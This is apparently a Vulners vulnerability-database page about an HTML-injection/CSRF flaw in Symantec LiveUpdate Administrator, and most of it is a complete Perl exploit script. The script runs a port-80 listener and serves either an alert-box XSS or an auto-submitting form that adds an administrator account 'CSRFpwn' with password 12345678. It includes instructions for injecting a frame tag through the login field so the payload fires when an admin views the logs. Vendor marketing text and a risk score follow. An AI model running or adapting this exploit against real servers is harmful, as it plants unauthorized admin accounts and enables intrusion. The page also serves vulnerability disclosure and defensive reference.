Vulners
Lucene search
Symantec LiveUpdate Administrator Management GUI HTML Injection
Source: http://www.securityfocus.com/bid/46856/info
Symantec LiveUpdate Administrator is prone to an HTML-injection vulnerability.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
#!/usr/bin/perl
##
# Title: Symantec Live Update Administrator CSRF Exploit
# Name: luaCSRF.pl
# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
# Use it only for education or ethical pentesting! The author accepts
# no liability for damage caused by this tool.
#
##
use Socket;
use IO::Handle;
use Getopt::Std;
my %args;
getopt('g:h:', \%args);
my $payload = $args{g} || usage();
my $victim = $args{h} || usage();
banner();
if ($payload eq "1") {
print "[+] Using the Alert Box payload\n";
# Alert Box
$html = <<ENDHTML;
<html>
<SCRIPT LANGUAGE="JavaScript">alert('!!!XSS/CSRF vulnerability!!!')</SCRIPT>
</html>
ENDHTML
} elsif ($payload eq "2") {
print "[+] Using the add admin user payload\n";
# Adds the user CSRFpwn with password 12345678
$html = <<ENDHTML;
<html>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://$victim:7070/lua/adduser.do" method="post">
<input type="hidden" name="dispatch" value="save" />
<input type="hidden" name="username" value="CSRFpwn" />
<input type="hidden" name="password" value="12345678"/>
<input type="hidden" name="verifyPassword" value="12345678"/>
<input type="hidden" name="lastname" value="junk" />
<input type="hidden" name="firstname" value="junk" />
<input type="hidden" name="email" value="junk@junk.com" />
<input type="hidden" name="userRole" value="1" />
</form>
</body>
</html>
ENDHTML
}
my $protocol = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "[-] socket() failed: $!";
setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "[-] Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in(80,INADDR_ANY);
bind(SOCK,$my_addr) or die "[-] bind() failed: $!";
listen(SOCK,SOMAXCONN) or die "[-] listen() failed: $!";
warn "[+] waiting for incoming connections on port 80...\n";
warn "[+] Enter the following String in the LUA username login field\n";
warn "[+] (e.q. HTTP/SSH) and wair for the admin to view the Logs\n";
warn "[+]\n";
warn "[+] <frame src=http://<LOCAL_ADDRESS>/.html>\n";
$repeat = 1;
$victim = inet_aton("0.0.0.0");
while($repeat) {
my $remote_addr = accept(SESSION,SOCK);
my ($port,$hisaddr) = sockaddr_in($remote_addr);
warn "[+] Connection from [",inet_ntoa($hisaddr),",$port]\n";
$victim = $hisaddr;
SESSION->autoflush(1);
if(<SESSION>) {
print SESSION $http_header . $html;
}
warn "[+] Connection from [",inet_ntoa($hisaddr),",$port] finished\n";
close SESSION;
}
sub usage {
print $payload;
print "\n";
print " luaCSRF.pl - Symantec LUA CSRF Exploit\n";
print "===============================================================\n\n";
print " Usage:\n";
print " $0 -g <payload> -h <lua-ip>\n";
print " Optional:\n";
print " -p <local port to listen on>\n";
print " -g (1|2) <payload to use>\n";
print " 1 <Execute an alert box\n";
print " 2 <Add the Admin User \"CSRFpwn\">\n";
print " Notes:\n";
print " -nothing here\n";
print "\n";
print " Author:\n";
print " Nikolas Sotiriu (lofi)\n";
print " url: www.sotiriu.de\n";
print " mail: lofi[at]sotiriu.de\n";
print "\n";
exit(1);
}
sub banner {
print STDERR << "EOF";
--------------------------------------------------------------------------------
luaCSRF.pl - Symantec LUA CSRF Exploit
--------------------------------------------------------------------------------
111 1111111
11100 101 00110111001111
11101 11 10 111 101 1001111111
1101 11 00 10 11 11 111 1111111101
10111 1 10 11 10 0 10 1 1 1 1111111011
1111 1 1 10 0 01 01 01 1 1 111 1111011101
1000 0 11 10 10 0 10 11 111 11111 11 1111 111100
1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11
10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111
101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111
011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001
1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001
1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101
011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01
1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111
111 1111 10 0 111110 0111 0 1 0111111111111111111111 11111 1111
111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001
111 1011111 1 11111111110111111111111111111111111111111 01 10111001
11 1100 10110110 10001 11101111111111111111 10 111 11100
111 00 1011101 00101 0 11111111111111111001 11 111101
11 00 00 101 1000011 1011 1111 1111111000 1111111 0
11 00 0 1011 100001 101000 1 1001 00001111 01
01101 11111 1011 01100 0101 110 11 10
10111 1 0 01 0000011 10 10
10011 11100 1111 101 11
1110 01 101011 1001100
1111000011 1 111
11000001111
1
EOF
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1